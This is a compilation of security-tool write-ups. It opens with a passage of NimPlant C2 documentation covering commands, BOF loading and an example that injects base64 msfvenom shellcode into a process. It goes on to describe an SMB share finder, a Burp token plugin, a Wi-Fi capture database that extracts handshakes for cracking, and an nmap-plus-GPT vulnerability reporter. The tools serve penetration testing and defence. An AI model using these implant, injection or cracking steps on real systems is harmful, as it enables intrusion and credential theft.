shinject (GUI) [targetpid] [localfilepath] Load raw shellcode from a file and inject it into the specified process's memory space using dynamic invocation.
sleep [sleeptime] <jitter%> Change the sleep time of the current NimPlant.
upload (GUI) [localfilepath] <remotefilepath> Upload a file from the NimPlant server to the victim machine.
wget [url] <remotefilepath> Download a file to disk remotely.
whoami Get the user ID that NimPlant is running as.

Using Beacon Object Files (BOFs)

NOTE: BOFs are volatile by nature, and running a faulty BOF or passing wrong arguments or types WILL crash your NimPlant session! Make sure to test BOFs before deploying!

NimPlant supports the in-memory loading of BOFs thanks to the great NiCOFF project. Running a BOF requires a locally compiled BOF object file (usually called something like bofname.x64.o), an entrypoint (commonly go), and a list of arguments with their respective argument types. Arguments are passed as space-separated arg argtype pairs.

Arguments are given in accordance with the "Zzsib" format, so they can be either string (alias: z), wstring (or Z), integer (aliases: int or i), short (s), or binary (bin or b). Binary arguments can be a raw binary string or base64-encoded; the latter is recommended to avoid bad characters.

Some examples of usage (using the magnificent TrustedSec BOFs [1, 2] as an example) are given below. Note that inline-execute (without arguments) can be used to configure the command graphically in the GUI.

# Run a bof without arguments
inline-execute ipconfig.x64.o go

# Run the `dir` bof with one wide-string argument specifying the path to list, quoting optional
inline-execute dir.x64.o go "C:\Users\victimuser\desktop" Z

# Run an injection BOF specifying an integer for the process ID and base64-encoded shellcode as bytes
# Example shellcode generated with the command: msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f base64
inline-execute /linux/path/to/createremotethread.x64.o go 1337 i /EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA b

# Depending on the BOF, sometimes argument parsing is a bit different using NiCOFF
# Make sure arguments are passed as expected by the BOF (can usually be retrieved from .CNA or BOF source)
# An example:
inline-execute enum_filter_driver.x64.o go # CRASHES - default null handling does not work
inline-execute enum_filter_driver.x64.o go "" z # OK - arguments are passed as expected

Push Notifications

By default, NimPlant supports push notifications via the notify_user() hook defined in server/util/notify.py. Out of the box it implements a simple Telegram notification, which requires the TELEGRAM_CHAT_ID and TELEGRAM_BOT_TOKEN environment variables to be set before it will fire. Of course, the code can easily be extended with your own push notification functionality. The notify_user() hook is called when a new NimPlant checks in, and receives an object with NimPlant details, which can then be pushed as desired.
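
A minimal sketch of a custom hook is shown below. Only the general shape of the hook is documented here ("an object with NimPlant details"), so the attribute names on the np argument are hypothetical placeholders; check the object the server actually passes for the real field names.

# server/util/notify.py (sketch): push check-in details to a generic webhook
# instead of Telegram. The 'hostname'/'ipAddrExt' attributes are assumed names.
import json
import urllib.request

def notify_user(np):
    # Called by the NimPlant server when a new NimPlant checks in.
    message = "New NimPlant check-in: %s (%s)" % (
        getattr(np, "hostname", "?"), getattr(np, "ipAddrExt", "?"))
    req = urllib.request.Request(
        "https://webhook.example.com/nimplant",  # hypothetical endpoint
        data=json.dumps({"text": message}).encode(),
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(req)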

Building the frontend

As a normal user, you shouldn't have to modify or re-build the UI that comes with Nimplant. However, if you so desire to make changes, install NodeJS and run an npm install while in the ui directory. Then run ui/build-ui.py. This will take care of pulling the packages, compiling the Next.JS frontend, and placing the files in the right location for the Nimplant server to use them.

A word on production use and OPSEC

NimPlant was developed as a learning project and released to the public for transparency and educational purposes. For a large part, it makes no effort to hide its intentions. Additionally, protections have been put in place to prevent abuse. In other words, do NOT use NimPlant in production engagements as-is without thorough source code review and modifications! Also remember that, as with any C2 framework, the OPSEC fingerprint of running certain commands should be considered before deployment. NimPlant can be compiled without OPSEC-risky commands by setting riskyMode to false in config.toml.

Troubleshooting

There are many reasons why Nimplant may fail to compile or run. If you encounter issues, please try the following (in order):

  • Ensure you followed the steps as described in the 'Installation' section above, double check that all dependencies are installed and the versions match
  • Ensure you followed the steps as described in the 'Compilation' section above, and that you have used the chvancooten/nimbuild docker container to rule out any dependency issues
  • Check the logs in the server/logs directory for any errors
  • Try the nim-debug compilation mode to compile with console and debug messages (.exe only) to see if any error messages are returned
  • Try compiling from another OS or with another toolchain to see if the same error occurs
  • If all of the above fails, submit an issue. Make sure to include the appropriate build information (OS, nim/python versions, dependency versions) and the outcome of the troubleshooting steps above. Incomplete issues may be closed without notice.


FindUncommonShares - A Python Equivalent Of PowerView's Invoke-ShareFinder.ps1 Allowing To Quickly Find Uncommon Shares In Vast Windows Domains

 


The script FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Active Directory Domains.

Features

  • Only requires a low-privileged domain user account.
  • Automatically gets the list of all computers from the domain controller's LDAP.
  • Ignores hidden shares (ending with $) with --ignore-hidden-shares.
  • Multithreaded connections to discover SMB shares.
  • Exports results in JSON with IP, name, comment, flags and UNC path with --export-json <file.json>.
  • Exports results in XLSX with IP, name, comment, flags and UNC path with --export-xlsx <file.xlsx>.
  • Exports results in SQLITE3 with IP, name, comment, flags and UNC path with --export-sqlite <file.db>.
  • Iterates over LDAP result pages to get every computer in the domain, no matter the size.

Usage

$ ./FindUncommonShares.py -h
FindUncommonShares v2.4 - by @podalirius_

usage: FindUncommonShares.py [-h] [--use-ldaps] [-q] [--debug] [-no-colors] [-I] [-t THREADS] [--export-xlsx EXPORT_XLSX] [--export-json EXPORT_JSON] [--export-sqlite EXPORT_SQLITE] --dc-ip ip address [-d DOMAIN] [-u USER]
[--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]

Find uncommon SMB shares on remote machines.

optional arguments:
-h, --help show this help message and exit
--use-ldaps Use LDAPS instead of LDAP
-q, --quiet Show no information at all.
--debug Debug mode.
-no-colors Disables colored output mode
-I, --ignore-hidden-shares
Ignores hidden shares (shares ending with $)
-t THREADS, --threads THREADS
Number of threads (default: 20)

Output files:
--export-xlsx EXPORT_XLSX
Output XLSX file to store the results in.
--export-json EXPORT_JSON
Output JSON file to store the results in.
--export-sqlite EXPORT_SQLITE
Output SQLITE3 file to store the results in.

Authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with

Credentials:
--no-pass Don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
Password to authenticate with
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line

Examples:

$ ./FindUncommonShares.py -u 'user1' -d 'LAB.local' -p 'P@ssw0rd!' --dc-ip 192.168.2.1
FindUncommonShares v2.3 - by @podalirius_

[>] Extracting all computers ...
[+] Found 2 computers.

[>] Enumerating shares ...
[>] Found 'Users' on 'DC01.LAB.local'
[>] Found 'WeirdShare' on 'DC01.LAB.local' (comment: 'Test comment')
[>] Found 'AnotherShare' on 'PC01.LAB.local'
[>] Found 'Users' on 'PC01.LAB.local'
$

Each JSON entry looks like this:

{
  "computer": {
    "fqdn": "DC01.LAB.local",
    "ip": "192.168.1.1"
  },
  "share": {
    "name": "ADMIN$",
    "comment": "Remote Admin",
    "hidden": true,
    "uncpath": "\\\\192.168.1.46\\ADMIN$\\",
    "type": {
      "stype_value": 2147483648,
      "stype_flags": [
        "STYPE_DISKTREE",
        "STYPE_TEMPORARY"
      ]
    }
  }
}
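
Because the export is plain JSON, post-processing is straightforward. A small sketch, assuming --export-json produced a list of entries shaped like the one above in export.json:

# Print the UNC path of every non-hidden share from a FindUncommonShares
# JSON export.
import json

with open("export.json") as f:
    entries = json.load(f)

for entry in entries:
    share = entry["share"]
    if not share["hidden"]:
        print("%s  (comment: %s)" % (share["uncpath"], share.get("comment", "")))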




Ator - Authentication Token Obtain and Replace Extender


The plugin is created to help automated scanning using Burp in the following scenarios:

  1. Access/Refresh token
  2. Token replacement in XML/JSON body
  3. Token replacement in cookies

The above can be achieved using complex macros, session rules or a custom extender in some scenarios, but the rules become tricky and do not work when the replacement text is JSON or XML.

Key advantages:

  1. We have achieved in-memory token replacement, avoiding the duplicate login requests required by both a custom extender and macros/session rules.
  2. Easy UX to help obtain data (from response) and replace data (in requests) using regex. This helps achieve complex scenarios where response body is JSON, XML and the request text is also JSON, XML, form data etc.
  3. Scan speed - the scan speed increases considerably because there are no extra login requests. A "Trigger Request" defines the error condition (which can also include a regex) on which the login requests are triggered. The error condition can include, for example, (response code = 401 and body contains "Unauthorized request").

The inspiration for the plugin is from ExtendedMacro plugin: https://github.com/FrUh/ExtendedMacro

Blogs

  1. Authentication Token Obtain and Replace (ATOR) Burp Plugin - Part1 - Single step login sequence and single token extraction
  2. Authentication Token Obtain and Replace (ATOR) Burp Plugin - Part2 - Multi step login sequence and multiple extraction

Getting Started

  1. Install Java and Maven
  2. Clone the repository
  3. Run the "mvn clean install" command in cloned repo of where pom.xml is present
  4. Take the generated jar with dependencies from the target folder

Prerequisites

  1. Make sure a Java environment is set up on your machine.
  2. Configure Burp Suite to listen to the proxy traffic.
  3. Configure the Java environment from the Extender tab of Burp.

For usage with a test application, install the Tiredful API testing application from https://github.com/payatu/Tiredful-API.

Steps

  1. Identify the request which provides the error
  2. Identify the Error Pattern (details in section below)
  3. Obtain the data from the response using regex (see sample regex values)
  4. Replace this data in the request (use the same regex as step 3 along with the variable name)

Error Pattern:

There are 4 different ways to specify the error condition.

  1. Status Code: 401, 400
  2. Error in Body: give any text from the body content (Example: Access token expired)
  3. Error in Header: give any text from the header (Example: Unauthorized)
  4. Free Form: use this to give multiple conditions (st=400 && bd=Access token expired || hd=Unauthorized)

Regex with samples

  1. Use Authorization: Bearer \w* to match Authorization: Bearer AXXFFPPNSUSSUSSNSUSN
  2. Use Authorization: Bearer ([\w+._-]*) to match Authorization: Bearer AXX-F+FPPNS.USSUSSNSUSN
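
The obtain-and-replace flow boils down to two regex operations. Here is a quick Python illustration of the concept (ATOR itself is a Java Burp extension; the response body and token value below are made up):

# Extract a token from a login response, then substitute it into an outgoing
# request -- the same obtain/replace idea ATOR applies inside Burp.
import re

login_response = '{"access_token": "AXX-F+FPPNS.USSUSSNSUSN"}'
token = re.search(r'"access_token":\s*"([\w+._-]*)"', login_response).group(1)

request = "GET /api/v1/exams/MQ==/ HTTP/1.1\nAuthorization: Bearer EXPIRED"
request = re.sub(r"Authorization: Bearer [\w+._-]*",
                 "Authorization: Bearer " + token, request)
print(request)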

Break down into end to end tests

  1. Finding the invalid request:
    • http://HOST:PORT/api/v1/exams/MQ==/ with an invalid Bearer token.
  2. Identifying the error pattern:
    • The above request will give you a 401; here the error condition is Status Code = 401
  3. Match the regex with the request data
    • Authorization: Bearer \w* - this regex will match the access token which is passed.
  4. Replacement - How to replace
    • Replace the matched text (step 3 regex) with the extracted value (extraction configuration is discussed below; say the variable name is "token")
    • Authorization: Bearer token - the extracted token will be substituted.

Usage with test application

Idea: record the Tiredful application requests in Burp, configure the ATOR extender, and check whether the token is replaced by ATOR.

  1. Open the testing application in the browser you configured with Burp
    • Generate a token from http://HOST:PORT/handle-user-token/
    • Send the request http://HOST:PORT/api/v1/exams/MQ==/ passing the Authorization Bearer token (from the step above)
  2. Add the ATOR jar file as an extender in Burp
  3. Right-click on the request (/handle-user-token) in Proxy history and send it to the Authentication Token Obtain and Replace extender
  4. Add a new entry in the Extraction configuration by selecting the "access_token" value and giving it the name "token" (it may be any name). Note: for this application, one request is enough to generate a token; a token can also be generated after multiple requests.
  5. TRIGGER CONDITION:
    • Macro steps will get executed if the condition is matched.
    • After execution of steps, replace the incoming request by taking values from "Pattern" and "Replacement Area" if specified.
    • For our testing,
      • Error condition is 401 (Status Code)
      • Pattern is "Authorization: Bearer \w*" (specify the regex pattern for the text you want replaced with extracted values)
      • Replacement Area is "Authorization: Bearer <NAME which you gave in STEP 4>"
    • Click on the "Add" button.
  6. For this example, one replacement is enough to make the incoming request valid, but you can add multiple replacements for a single condition.
  7. Hit the invalid request from Repeater and check the req/res flows in either FLOW/Logger++
    • An invalid Bearer token (http://HOST:PORT/api/v1/exams/MQ==/) sent from Repeater results in a 401 response.
    • The extender will match this condition, start running the recorded steps, and extract the "access_token".
    • It then replaces the access token in the actual request (from Repeater), making this invalid request valid.
    • In the Repeater console, you see a 200 OK response.
  8. Do step 7 again and check the flow
    • This time the extender will not invoke the steps; the existing token is still valid, so it is reused.

Built With

  • Swing - used to build the UI panels

Contributing

Please read CONTRIBUTING.md for details on our code of conduct, and the process for submitting pull requests to us.

Versioning

v1.0

Authors

Authors from Synopsys - Ashwath Reddy (@ka3hk) and Manikandan Rajappan (@rmanikdn)

License

This software is released by Synopsys under the MIT license.

Acknowledgments

  • https://github.com/FrUh/ExtendedMacro ExtendedMacro was a great start - we have modified the UI to handle more complex scenarios. We have also fixed bugs and improved speed by replacing tokens in memory.

Demo Video

ATOR v2.0.0:

The UI panel was split into 4 different configuration sections. Check out the code from v2 or use the executable from v2/bin.

  1. Error Condition - find the error condition req/res and add a trigger condition [can be a status code, text in the body content, or text in a header]. Multiple conditions can also be added.
  2. Obtain Token - find all the req/res needed to get the token. It can be a single request or multiple requests (do the replacement accordingly).
  3. Error Condition Replacement - mark the trigger condition and also mark the place in the request where the replacement needs to happen (map the extraction).
  4. Preview - dry run it before configuring it for a scan.


Wifi_Db - Script To Parse Aircrack-ng Captures To A SQLite Database


Script to parse Aircrack-ng captures into a SQLite database and extract useful information like handshakes (in hashcat 22000 format), MGT identities, interesting relations between APs, clients and their probes, WPS information, and a global view of all the APs seen.

           _   __  _             _  _     
__ __(_) / _|(_) __| || |__
\ \ /\ / /| || |_ | | / _` || '_ \
\ V V / | || _|| | | (_| || |_) |
\_/\_/ |_||_| |_| _____ \__,_||_.__/
|_____|
by r4ulcl

Features

  • Displays if a network is cloaked (hidden) even if you have the ESSID.
  • Shows a detailed table of connected clients and their respective APs.
  • Identifies client probes connected to APs, providing insight into potential security risks using Rogue APs.
  • Extracts handshakes for use with hashcat, facilitating password cracking.
  • Displays identity information from enterprise networks, including the EAP method used for authentication.
  • Generates a summary of each AP group by ESSID and encryption, giving an overview of the security status of nearby networks.
  • Provides a WPS info table for each AP, detailing information about the Wi-Fi Protected Setup configuration of the network.
  • Logs all instances when a client or AP has been seen with the GPS data and timestamp, enabling location-based analysis.
  • Upload captures as a folder or a single file. This option supports the use of wildcards (*) to select multiple files or folders.
  • Docker version in Docker Hub to avoid dependencies.
  • Obfuscated mode for demonstrations and conferences.
  • Possibility to add static GPS data.

Install

From DockerHub (RECOMMENDED)

docker pull r4ulcl/wifi_db

Manual installation

Debian based systems (Ubuntu, Kali, Parrot, etc.)

Dependencies:

  • python3
  • python3-pip
  • tshark
  • hcxtools
sudo apt install tshark
sudo apt install python3 python3-pip

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt

Arch

Dependencies:

  • python3
  • python3-pip
  • tshark
  • hcxtools
sudo pacman -S wireshark-qt
sudo pacman -S python-pip python

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt

Usage

Scan with airodump-ng

Run airodump-ng saving the output with -w:

sudo airodump-ng wlan0mon -w scan --manufacturer --wps --gpsd

Create the SQLite database using Docker

#Folder with captures
CAPTURESFOLDER=/home/user/wifi

# Output database
touch db.SQLITE

docker run -t -v $PWD/db.SQLITE:/db.SQLITE -v $CAPTURESFOLDER:/captures/ r4ulcl/wifi_db
  • -v $PWD/db.SQLITE:/db.SQLITE: saves the output to the db.SQLITE file in the current folder
  • -v $CAPTURESFOLDER:/captures/: shares the captures folder with the Docker container

Create the SQLite database using manual installation

Once the capture is created, we can create the database by importing the capture. To do this, pass the name of the capture without the file extension.

python3 wifi_db.py scan-01

If we have multiple captures, we can load the folder containing them directly. With -d we can rename the output database.

python3 wifi_db.py -d database.sqlite scan-folder

Open database

The database can be opened with any SQLite viewer, such as DB Browser for SQLite.

An example of the ProbeClientsConnected view is shown in the original README.

Arguments

usage: wifi_db.py [-h] [-v] [--debug] [-o] [-t LAT] [-n LON] [--source [{aircrack-ng,kismet,wigle}]] [-d DATABASE] capture [capture ...]

positional arguments:
capture capture folder or file with extensions .csv, .kismet.csv, .kismet.netxml, or .log.csv. If no extension is provided, all types will
be added. This option supports the use of wildcards (*) to select multiple files or folders.

options:
-h, --help show this help message and exit
-v, --verbose increase output verbosity
--debug increase output verbosity to debug
-o, --obfuscated Obfuscate MAC and BSSID with AA:BB:CC:XX:XX:XX-defghi (WARNING: replaces them throughout the database)
-t LAT, --lat LAT insert a fake lat in the new elements
-n LON, --lon LON insert a fake lon in the new elements
--source [{aircrack-ng,kismet,wigle}]
source from capture data (default: aircrack-ng)
-d DATABASE, --database DATABASE
output database, if exist append to the given database (default name: db.SQLITE)

Kismet

TODO

Wigle

TODO

Database

wifi_db contains several tables to store information related to wireless network traffic captured by airodump-ng. The tables are as follows:

  • AP: This table stores information about the access points (APs) detected during the captures, including their MAC address (bssid), network name (ssid), whether the network is cloaked (cloaked), manufacturer (manuf), channel (channel), frequency (frequency), carrier (carrier), encryption type (encryption), and total packets received from this AP (packetsTotal). The table uses the MAC address as a primary key.

  • Client: This table stores information about the wireless clients detected during the captures, including their MAC address (mac), network name (ssid), manufacturer (manuf), device type (type), and total packets received from this client (packetsTotal). The table uses the MAC address as a primary key.

  • SeenClient: This table stores information about the clients seen during the captures, including their MAC address (mac), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt). The table uses the combination of MAC address and detection time as a primary key, and has a foreign key relationship with the Client table.

  • Connected: This table stores information about the wireless clients that are connected to an access point, including the MAC address of the access point (bssid) and the client (mac). The table uses a combination of access point and client MAC addresses as a primary key, and has foreign key relationships with both the AP and Client tables.

  • WPS: This table stores information about access points that have Wi-Fi Protected Setup (WPS) enabled, including their MAC address (bssid), network name (wlan_ssid), WPS version (wps_version), device name (wps_device_name), model name (wps_model_name), model number (wps_model_number), configuration methods (wps_config_methods), and keypad configuration methods (wps_config_methods_keypad). The table uses the MAC address as a primary key, and has a foreign key relationship with the AP table.

  • SeenAp: This table stores information about the access points seen during the captures, including their MAC address (bssid), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt), and timestamp (bsstimestamp). The table uses the combination of access point MAC address and detection time as a primary key, and has a foreign key relationship with the AP table.

  • Probe: This table stores information about the probes sent by clients, including the client MAC address (mac), network name (ssid), and time of probe (time). The table uses a combination of client MAC address and network name as a primary key, and has a foreign key relationship with the Client table.

  • Handshake: This table stores information about the handshakes captured during the captures, including the MAC address of the access point (bssid), the client (mac), the file name (file), and the hashcat format (hashcat). The table uses a combination of access point and client MAC addresses, and file name as a primary key, and has foreign key relationships with both the AP and Client tables.

  • Identity: This table represents EAP (Extensible Authentication Protocol) identities and methods used in wireless authentication. The bssid and mac fields are foreign keys that reference the AP and Client tables, respectively. Other fields include the identity and method used in the authentication process.

Views

  • ProbeClients: This view selects the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe and Client tables on the MAC address and orders the results by SSID.

  • ConnectedAP: This view selects the BSSID of the connected access point, the SSID of the access point, the MAC address of the connected client device, and the manufacturer of the client device. It joins the Connected, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • ProbeClientsConnected: This view selects the BSSID and SSID of the connected access point, the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe, Client, and ConnectedAP tables on the MAC address of the probe, and filters the results to exclude probes that are connected to the same SSID that they are probing. The results are ordered by the SSID of the probe.

  • HandshakeAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • HandshakeAPUnique: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and filters the results to exclude handshakes that were not cracked by hashcat. The results are grouped by SSID and ordered by BSSID.

  • IdentityAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the identity request, the manufacturer of the client device, the identity string, and the method used for the identity request. It joins the Identity, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • SummaryAP: This view selects the SSID, the count of access points broadcasting the SSID, the encryption type, the manufacturer of the access point, and whether the SSID is cloaked. It groups the results by SSID and orders them by the count of access points in descending order.
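To make the last view concrete, here is a query equivalent to what the SummaryAP description says it does. This is a sketch reconstructed from the prose above, not the view's actual SQL:

import sqlite3

con = sqlite3.connect("db.SQLITE")
# Count the APs broadcasting each SSID, grouped by SSID,
# ordered by AP count in descending order (as SummaryAP is described)
query = """
    SELECT ssid, COUNT(*) AS ap_count, encryption, manuf, cloaked
    FROM AP
    GROUP BY ssid
    ORDER BY ap_count DESC
"""
for row in con.execute(query):
    print(row)
con.close()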

TODO

  • Aircrack-ng

  • All in 1 file (and separately)

  • Kismet

  • Wigle

  • install

  • parse all files in folder -f --folder

  • Fix Extended errors, tildes, etc (fixed in aircrack-ng 1.6)

  • Support bash multi files: "capture*-1*"

  • Script to delete client or AP from DB (mac). - (Whitelist)

  • Whitelist to don't add mac to DB (file whitelist.txt, add macs, create DB)

  • Overwrite if there is new info (old ESSID='', New ESSID='WIFI')

  • Table Handhsakes and PMKID

  • Hashcat hash format 22000

  • Table files, if file exists skip (full path)

  • Get HTTP POST passwords

  • DNS querys


This program is a continuation of a part of: https://github.com/T1GR3S/airo-heat

Author

  • Raúl Calvo Laorden (@r4ulcl)

License

GNU General Public License v3.0



GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


This is a Proof of Concept application that demonstrates how AI can be used to generate accurate results for vulnerability analysis, and also allows further utilization of the already super useful ChatGPT.

Requirements

  • Python 3.10
  • All the packages mentioned in the requirements.txt file
  • An OpenAI API key

Usage

  • First, replace the "API__KEY" part of the code with your OpenAI API key
openai.api_key = "__API__KEY" # Enter your API key
  • Second, install the packages
pip3 install -r requirements.txt
or
pip install -r requirements.txt
  • Run the code: python3 gpt_vuln.py <> (or python gpt_vuln.py <> on Windows)

Supported on both Windows and Linux

Understanding the code

Profiles:

Parameter | Return data | Description           | Nmap Command
p1        | json        | Effective Scan        | -Pn -sV -T4 -O -F
p2        | json        | Simple Scan           | -Pn -T4 -A -v
p3        | json        | Low Power Scan        | -Pn -sS -sU -T4 -A -v
p4        | json        | Partial Intense Scan  | -Pn -p- -T4 -A -v
p5        | json        | Complete Intense Scan | -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

The profile is the type of scan that will be executed by the nmap subprocess, and the IP or target is provided via argparse. First the custom nmap scan is run with all the crucial arguments for the scan. Next, the relevant data is extracted from the huge pile of output produced by nmap: the "scan" object holds sub-data under "tcp", each entry labelled by the open port. Once extracted, the data is sent to the OpenAI davinci model via a prompt. The prompt specifically asks for JSON output and for the data to be used in a certain manner.
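Conceptually, the profile selection boils down to a small mapping from profile name to nmap arguments, plus an argparse front end. The sketch below illustrates that idea; the argument strings come from the table above, but the real tool's structure may differ:

import argparse
import nmap

# Nmap argument strings taken from the profile table above
PROFILES = {
    "p1": "-Pn -sV -T4 -O -F",
    "p2": "-Pn -T4 -A -v",
    "p3": "-Pn -sS -sU -T4 -A -v",
    "p4": "-Pn -p- -T4 -A -v",
    "p5": "-Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln",
}

parser = argparse.ArgumentParser()
parser.add_argument("target", help="IP or hostname to scan")
parser.add_argument("--profile", choices=PROFILES, default="p1")
args = parser.parse_args()

nm = nmap.PortScanner()
nm.scan(args.target, arguments=PROFILES[args.profile])
print(nm.analyse_nmap_xml_scan()["scan"])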

The entire structure of the request sent to the OpenAI API is defined in the completion section of the program.

import nmap
import openai

model_engine = "text-davinci-003"  # assumed engine name; the README only says the davinci model
nm = nmap.PortScanner()

def profile(ip):
    # Run the complete intense scan (profile p5) against the target
    nm.scan('{}'.format(ip), arguments='-Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln')
    json_data = nm.analyse_nmap_xml_scan()
    analize = json_data["scan"]
    # Prompt describing what the query is all about
    prompt = "do a vulnerability analysis of {} and return a vulnerability report in json".format(analize)
    # The structure of the completion request
    completion = openai.Completion.create(
        engine=model_engine,
        prompt=prompt,
        max_tokens=1024,
        n=1,
        stop=None,
    )
    response = completion.choices[0].text
    return response

Advantages

  • Can be used to develop more advanced systems built entirely on the API-and-scanner combination
  • Can increase the effectiveness of the final system
  • Highly productive when working with models such as GPT-3


Kali Linux 2023.1 - Penetration Testing and Ethical Hacking Linux Distribution


Time for another Kali Linux release! – Kali Linux 2023.1. This release has various impressive updates.

The changelog summary since the 2022.4 release from December:


More info here.


CertWatcher - A Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL


CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates. The tool helps to detect and analyze phishing websites via regular expression patterns, and is designed to be easy to use for security professionals and researchers.



Certwatcher continuously monitors the certificate data stream and checks for suspicious patterns or malicious activity. Certwatcher can also be customized to detect specific phishing patterns and combat the spread of malicious websites.

Get Started

Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

Useful Links

Contribution

If you want to contribute to this project, follow the steps below:

  • Fork this repository.
  • Create a new branch with your feature: git checkout -b my-new-feature
  • Make changes and commit the changes: git commit -m 'Adding a new feature'
  • Push to the original branch: git push origin my-new-feature
  • Open a pull request.

Authors



CertVerify - A Scanner That Detects Files Signed With Compromised Or Untrusted Code Signing Certificates


CertVerify is a tool designed to detect executable files (exe, dll, sys) that have been signed with untrusted or leaked code signing certificates. Its purpose is to identify potentially malicious files that have been signed using certificates that have been compromised, stolen, or are not from a trusted source.

Why is this tool needed?

Executable files signed with compromised or untrusted code signing certificates can be used to distribute malware and other malicious software. Attackers can use these files to bypass security controls and to make their malware appear legitimate to victims. This tool helps to identify these files so that they can be removed or investigated further.

This tool is a continuation of my previous malware scanner project. A tool of this type is also essential during security incident response.

Scope of use and limitations

  1. The CertVerify cannot guarantee that all files identified as suspicious are necessarily malicious. It is possible for files to be falsely identified as suspicious, or for malicious files to go undetected by the scanner.

  2. The scanner only targets code signing certificates that have been identified as malicious by the public community. This includes certificates extracted by malware analysis tools and services, and other public sources. There are many unverified malware-signing certificates, and it is not possible to obtain them all, so the tool can only detect some of them. For additional detection, you have to extract the certificate's serial number and fingerprint information yourself and add it to the signatures.

  3. The scope of this tool does not include extracting code signing information from special rootkits that have already taken hold beneath the kernel, such as fileless bootkits, or from files hidden with advanced techniques. In other words, this tool runs at the user level; similar functions at the kernel level are performed more accurately by an anti-rootkit or EDR. Please keep this in mind and focus on the ideas and principles. To implement a principle appropriate to the purpose of this tool, you would need to develop a driver (sys) and run it in the kernel with NT\SYSTEM privileges.

  4. Nevertheless, if you want to run this tool during a Windows intrusion incident and your focus is sys files, boot into safe mode or another boot option that does not load extra driver (sys) files (loading only the default system drivers) before running the tool. This can be a little more helpful.

  5. Alternatively, mount the Windows system disk on a Linux machine and run the tool in the Linux environment. This could yield better results.

Features

  • File inspection based on leaked or untrusted certificate lists.
  • Scanning includes subdirectories.
  • Ability to define directories to exclude from scanning.
  • Supports multiprocessing for faster job execution.
  • Whitelisting based on certificate subject (e.g., Microsoft subject certificates are exempt from detection).
  • Option to skip inspection of unsigned files for faster scans.
  • Easy integration with SIEM systems such as Splunk by attaching scan_logs.
  • Easy-to-handle and customizable code and function structure.

And...

  • Please let me know if any changes are required or if additional features are needed.
  • If you find this helpful, please consider giving it a "star"
    to support further improvements.

v1.0.0

Scan result_log

datetime="2023-03-06 20:17:57",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issu   er_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
